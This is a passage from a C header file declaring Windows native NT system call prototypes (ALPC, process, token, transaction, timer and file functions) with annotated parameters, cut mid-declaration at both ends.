ResourceId);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteSectionView(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID ViewBase);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDeleteSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE ContextHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcDisconnectPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcImpersonateClientContainerOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcImpersonateClientOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN PVOID Flags);\r\n\r\nEXTERN_C NTSTATUS NtAlpcOpenSenderProcess(\r\n\tOUT 
PHANDLE ProcessHandle,\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ULONG Flags,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcOpenSenderThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ULONG Flags,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAlpcQueryInformation(\r\n\tIN HANDLE PortHandle OPTIONAL,\r\n\tIN ALPC_PORT_INFORMATION_CLASS PortInformationClass,\r\n\tIN OUT PVOID PortInformation,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcQueryInformationMessage(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE PortMessage,\r\n\tIN ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass,\r\n\tOUT PVOID MessageInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcRevokeSecurityContext(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE ContextHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlpcSendWaitReceivePort(\r\n\tIN HANDLE PortHandle,\r\n\tIN ULONG Flags,\r\n\tIN PPORT_MESSAGE SendMessage OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage OPTIONAL,\r\n\tIN OUT PSIZE_T BufferLength OPTIONAL,\r\n\tIN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlpcSetInformation(\r\n\tIN HANDLE PortHandle,\r\n\tIN ALPC_PORT_INFORMATION_CLASS PortInformationClass,\r\n\tIN PVOID PortInformation OPTIONAL,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtAreMappedFilesTheSame(\r\n\tIN PVOID File1MappedAsAnImage,\r\n\tIN PVOID File2MappedAsFile);\r\n\r\nEXTERN_C NTSTATUS NtAssignProcessToJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS 
NtAssociateWaitCompletionPacket(\r\n\tIN HANDLE WaitCompletionPacketHandle,\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN HANDLE TargetObjectHandle,\r\n\tIN PVOID KeyContext OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tIN NTSTATUS IoStatus,\r\n\tIN ULONG_PTR IoStatusInformation,\r\n\tOUT PBOOLEAN AlreadySignaled OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCallEnclave(\r\n\tIN PENCLAVE_ROUTINE Routine,\r\n\tIN PVOID Parameter,\r\n\tIN BOOLEAN WaitForThread,\r\n\tIN OUT PVOID ReturnValue OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCancelIoFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtCancelSynchronousIoFile(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtCancelTimer2(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PT2_CANCEL_PARAMETERS Parameters);\r\n\r\nEXTERN_C NTSTATUS NtCancelWaitCompletionPacket(\r\n\tIN HANDLE WaitCompletionPacketHandle,\r\n\tIN BOOLEAN RemoveSignaledPacket);\r\n\r\nEXTERN_C NTSTATUS NtCommitComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCommitEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCommitRegistryTransaction(\r\n\tIN HANDLE RegistryHandle,\r\n\tIN BOOL Wait);\r\n\r\nEXTERN_C NTSTATUS NtCommitTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Wait);\r\n\r\nEXTERN_C NTSTATUS NtCompactKeys(\r\n\tIN ULONG Count,\r\n\tIN HANDLE KeyArray);\r\n\r\nEXTERN_C NTSTATUS NtCompareObjects(\r\n\tIN HANDLE FirstObjectHandle,\r\n\tIN HANDLE SecondObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtCompareSigningLevels(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2);\r\n\r\nEXTERN_C NTSTATUS NtCompareTokens(\r\n\tIN HANDLE FirstTokenHandle,\r\n\tIN HANDLE SecondTokenHandle,\r\n\tOUT PBOOLEAN 
Equal);\r\n\r\nEXTERN_C NTSTATUS NtCompleteConnectPort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtCompressKey(\r\n\tIN HANDLE Key);\r\n\r\nEXTERN_C NTSTATUS NtConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos,\r\n\tIN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,\r\n\tIN OUT PPORT_SECTION_READ ServerView OPTIONAL,\r\n\tOUT PULONG MaxMessageLength OPTIONAL,\r\n\tIN OUT PVOID ConnectionInformation OPTIONAL,\r\n\tIN OUT PULONG ConnectionInformationLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(\r\n\tIN ULONG UnknownParameter1,\r\n\tIN ULONG UnknownParameter2,\r\n\tIN ULONG UnknownParameter3,\r\n\tIN ULONG UnknownParameter4);\r\n\r\nEXTERN_C NTSTATUS NtCreateDebugObject(\r\n\tOUT PHANDLE DebugObjectHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateDirectoryObject(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtCreateDirectoryObjectEx(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN HANDLE ShadowDirectoryHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateEnclave(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG_PTR ZeroBits,\r\n\tIN SIZE_T Size,\r\n\tIN SIZE_T InitialCommitment,\r\n\tIN ULONG EnclaveType,\r\n\tIN PVOID EnclaveInformation,\r\n\tIN ULONG EnclaveInformationLength,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEnlistment(\r\n\tOUT PHANDLE EnlistmentHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN HANDLE TransactionHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN NOTIFICATION_MASK NotificationMask,\r\n\tIN 
PVOID EnlistmentKey OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEventPair(\r\n\tOUT PHANDLE EventPairHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateIRTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess);\r\n\r\nEXTERN_C NTSTATUS NtCreateIoCompletion(\r\n\tOUT PHANDLE IoCompletionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG Count OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateJobObject(\r\n\tOUT PHANDLE JobHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateJobSet(\r\n\tIN ULONG NumJob,\r\n\tIN PJOB_SET_ARRAY UserJobSet,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateKeyTransacted(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG TitleIndex,\r\n\tIN PUNICODE_STRING Class OPTIONAL,\r\n\tIN ULONG CreateOptions,\r\n\tIN HANDLE TransactionHandle,\r\n\tOUT PULONG Disposition OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateKeyedEvent(\r\n\tOUT PHANDLE KeyedEventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateLowBoxToken(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PSID PackageSid,\r\n\tIN ULONG CapabilityCount,\r\n\tIN PSID_AND_ATTRIBUTES Capabilities OPTIONAL,\r\n\tIN ULONG HandleCount,\r\n\tIN HANDLE Handles OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateMailslotFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CreateOptions,\r\n\tIN ULONG MailslotQuota,\r\n\tIN ULONG MaximumMessageSize,\r\n\tIN PLARGE_INTEGER 
ReadTimeout);\r\n\r\nEXTERN_C NTSTATUS NtCreateMutant(\r\n\tOUT PHANDLE MutantHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN BOOLEAN InitialOwner);\r\n\r\nEXTERN_C NTSTATUS NtCreateNamedPipeFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG CreateDisposition,\r\n\tIN ULONG CreateOptions,\r\n\tIN BOOLEAN NamedPipeType,\r\n\tIN BOOLEAN ReadMode,\r\n\tIN BOOLEAN CompletionMode,\r\n\tIN ULONG MaximumInstances,\r\n\tIN ULONG InboundQuota,\r\n\tIN ULONG OutboundQuota,\r\n\tIN PLARGE_INTEGER DefaultTimeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreatePagingFile(\r\n\tIN PUNICODE_STRING PageFileName,\r\n\tIN PULARGE_INTEGER MinimumSize,\r\n\tIN PULARGE_INTEGER MaximumSize,\r\n\tIN ULONG Priority);\r\n\r\nEXTERN_C NTSTATUS NtCreatePartition(\r\n\tOUT PHANDLE PartitionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG PreferredNode);\r\n\r\nEXTERN_C NTSTATUS NtCreatePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG MaxConnectionInfoLength,\r\n\tIN ULONG MaxMessageLength,\r\n\tIN ULONG MaxPoolUsage OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreatePrivateNamespace(\r\n\tOUT PHANDLE NamespaceHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PVOID BoundaryDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtCreateProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN BOOLEAN InheritObjectTable,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateProfile(\r\n\tOUT PHANDLE ProfileHandle,\r\n\tIN HANDLE Process OPTIONAL,\r\n\tIN PVOID 
ProfileBase,\r\n\tIN ULONG ProfileSize,\r\n\tIN ULONG BucketSize,\r\n\tIN PULONG Buffer,\r\n\tIN ULONG BufferSize,\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tIN ULONG Affinity);\r\n\r\nEXTERN_C NTSTATUS NtCreateProfileEx(\r\n\tOUT PHANDLE ProfileHandle,\r\n\tIN HANDLE Process OPTIONAL,\r\n\tIN PVOID ProfileBase,\r\n\tIN SIZE_T ProfileSize,\r\n\tIN ULONG BucketSize,\r\n\tIN PULONG Buffer,\r\n\tIN ULONG BufferSize,\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tIN USHORT GroupCount,\r\n\tIN PGROUP_AFFINITY GroupAffinity);\r\n\r\nEXTERN_C NTSTATUS NtCreateRegistryTransaction(\r\n\tOUT PHANDLE Handle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN DWORD Flags);\r\n\r\nEXTERN_C NTSTATUS NtCreateResourceManager(\r\n\tOUT PHANDLE ResourceManagerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE TmHandle,\r\n\tIN LPGUID RmGuid,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN PUNICODE_STRING Description OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSemaphore(\r\n\tOUT PHANDLE SemaphoreHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN LONG InitialCount,\r\n\tIN LONG MaximumCount);\r\n\r\nEXTERN_C NTSTATUS NtCreateSymbolicLinkObject(\r\n\tOUT PHANDLE LinkHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PUNICODE_STRING LinkTarget);\r\n\r\nEXTERN_C NTSTATUS NtCreateThreadEx(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID Argument OPTIONAL,\r\n\tIN ULONG CreateFlags,\r\n\tIN SIZE_T ZeroBits,\r\n\tIN SIZE_T StackSize,\r\n\tIN SIZE_T MaximumStackSize,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES 
ObjectAttributes OPTIONAL,\r\n\tIN TIMER_TYPE TimerType);\r\n\r\nEXTERN_C NTSTATUS NtCreateTimer2(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN PVOID Reserved1 OPTIONAL,\r\n\tIN PVOID Reserved2 OPTIONAL,\r\n\tIN ULONG Attributes,\r\n\tIN ACCESS_MASK DesiredAccess);\r\n\r\nEXTERN_C NTSTATUS NtCreateToken(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tIN PLUID AuthenticationId,\r\n\tIN PLARGE_INTEGER ExpirationTime,\r\n\tIN PTOKEN_USER User,\r\n\tIN PTOKEN_GROUPS Groups,\r\n\tIN PTOKEN_PRIVILEGES Privileges,\r\n\tIN PTOKEN_OWNER Owner OPTIONAL,\r\n\tIN PTOKEN_PRIMARY_GROUP PrimaryGroup,\r\n\tIN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,\r\n\tIN PTOKEN_SOURCE TokenSource);\r\n\r\nEXTERN_C NTSTATUS NtCreateTokenEx(\r\n\tOUT PHANDLE TokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tIN PLUID AuthenticationId,\r\n\tIN PLARGE_INTEGER ExpirationTime,\r\n\tIN PTOKEN_USER User,\r\n\tIN PTOKEN_GROUPS Groups,\r\n\tIN PTOKEN_PRIVILEGES Privileges,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes OPTIONAL,\r\n\tIN PTOKEN_GROUPS DeviceGroups OPTIONAL,\r\n\tIN PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy OPTIONAL,\r\n\tIN PTOKEN_OWNER Owner OPTIONAL,\r\n\tIN PTOKEN_PRIMARY_GROUP PrimaryGroup,\r\n\tIN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,\r\n\tIN PTOKEN_SOURCE TokenSource);\r\n\r\nEXTERN_C NTSTATUS NtCreateTransaction(\r\n\tOUT PHANDLE TransactionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN LPGUID Uow OPTIONAL,\r\n\tIN HANDLE TmHandle OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN ULONG IsolationLevel OPTIONAL,\r\n\tIN ULONG IsolationFlags OPTIONAL,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tIN PUNICODE_STRING Description 
OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateTransactionManager(\r\n\tOUT PHANDLE TmHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PUNICODE_STRING LogFileName OPTIONAL,\r\n\tIN ULONG CreateOptions OPTIONAL,\r\n\tIN ULONG CommitStrength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateUserProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK ProcessDesiredAccess,\r\n\tIN ACCESS_MASK ThreadDesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ProcessObjectAttributes OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES ThreadObjectAttributes OPTIONAL,\r\n\tIN ULONG ProcessFlags,\r\n\tIN ULONG ThreadFlags,\r\n\tIN PVOID ProcessParameters OPTIONAL,\r\n\tIN OUT PPS_CREATE_INFO CreateInfo,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWaitCompletionPacket(\r\n\tOUT PHANDLE WaitCompletionPacketHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWaitablePort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN ULONG MaxConnectionInfoLength,\r\n\tIN ULONG MaxMessageLength,\r\n\tIN ULONG MaxPoolUsage OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateWnfStateName(\r\n\tOUT PCWNF_STATE_NAME StateName,\r\n\tIN WNF_STATE_NAME_LIFETIME NameLifetime,\r\n\tIN WNF_DATA_SCOPE DataScope,\r\n\tIN BOOLEAN PersistData,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN ULONG MaximumStateSize,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtCreateWorkerFactory(\r\n\tOUT PHANDLE WorkerFactoryHandleReturn,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE CompletionPortHandle,\r\n\tIN HANDLE WorkerProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID StartParameter OPTIONAL,\r\n\tIN ULONG MaxThreadCount OPTIONAL,\r\n\tIN SIZE_T StackReserve OPTIONAL,\r\n\tIN SIZE_T StackCommit 
OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDebugActiveProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE DebugObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtDebugContinue(\r\n\tIN HANDLE DebugObjectHandle,\r\n\tIN PCLIENT_ID ClientId,\r\n\tIN NTSTATUS ContinueStatus);\r\n\r\nEXTERN_C NTSTATUS NtDeleteAtom(\r\n\tIN USHORT Atom);\r\n\r\nEXTERN_C NTSTATUS NtDeleteBootEntry(\r\n\tIN ULONG Id);\r\n\r\nEXTERN_C NTSTATUS NtDeleteDriverEntry(\r\n\tIN ULONG Id);\r\n\r\nEXTERN_C NTSTATUS NtDeleteFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtDeleteKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtDeleteObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN BOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtDeletePrivateNamespace(\r\n\tIN HANDLE NamespaceHandle);\r\n\r\nEXTERN_C NTSTATUS NtDeleteValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName);\r\n\r\nEXTERN_C NTSTATUS NtDeleteWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PVOID ExplicitScope OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeleteWnfStateName(\r\n\tIN PCWNF_STATE_NAME StateName);\r\n\r\nEXTERN_C NTSTATUS NtDisableLastKnownGood();\r\n\r\nEXTERN_C NTSTATUS NtDisplayString(\r\n\tIN PUNICODE_STRING String);\r\n\r\nEXTERN_C NTSTATUS NtDrawText(\r\n\tIN PUNICODE_STRING String);\r\n\r\nEXTERN_C NTSTATUS NtEnableLastKnownGood();\r\n\r\nEXTERN_C NTSTATUS NtEnumerateBootEntries(\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateDriverEntries(\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateSystemEnvironmentValuesEx(\r\n\tIN ULONG InformationClass,\r\n\tOUT PVOID Buffer,\r\n\tIN OUT PULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateTransactionObject(\r\n\tIN HANDLE RootObjectHandle OPTIONAL,\r\n\tIN KTMOBJECT_TYPE QueryType,\r\n\tIN OUT PKTMOBJECT_CURSOR ObjectCursor,\r\n\tIN ULONG 
ObjectCursorLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtExtendSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN OUT PLARGE_INTEGER NewSectionSize);\r\n\r\nEXTERN_C NTSTATUS NtFilterBootOption(\r\n\tIN FILTER_BOOT_OPTION_OPERATION FilterOperation,\r\n\tIN ULONG ObjectType,\r\n\tIN ULONG ElementType,\r\n\tIN PVOID SystemData OPTIONAL,\r\n\tIN ULONG DataSize);\r\n\r\nEXTERN_C NTSTATUS NtFilterToken(\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ULONG Flags,\r\n\tIN PTOKEN_GROUPS SidsToDisable OPTIONAL,\r\n\tIN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedSids OPTIONAL,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtFilterTokenEx(\r\n\tIN HANDLE TokenHandle,\r\n\tIN ULONG Flags,\r\n\tIN PTOKEN_GROUPS SidsToDisable OPTIONAL,\r\n\tIN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedSids OPTIONAL,\r\n\tIN ULONG DisableUserClaimsCount,\r\n\tIN PUNICODE_STRING UserClaimsToDisable OPTIONAL,\r\n\tIN ULONG DisableDeviceClaimsCount,\r\n\tIN PUNICODE_STRING DeviceClaimsToDisable OPTIONAL,\r\n\tIN PTOKEN_GROUPS DeviceGroupsToDisable OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedUserAttributes OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedDeviceAttributes OPTIONAL,\r\n\tIN PTOKEN_GROUPS RestrictedDeviceGroups OPTIONAL,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtFlushBuffersFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID Parameters,\r\n\tIN ULONG ParametersSize,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtFlushInstallUILanguage(\r\n\tIN LANGID InstallUILanguage,\r\n\tIN ULONG SetComittedFlag);\r\n\r\nEXTERN_C NTSTATUS NtFlushInstructionCache(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtFlushKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtFlushProcessWriteBuffers();\r\n\r\nEXTERN_C NTSTATUS 
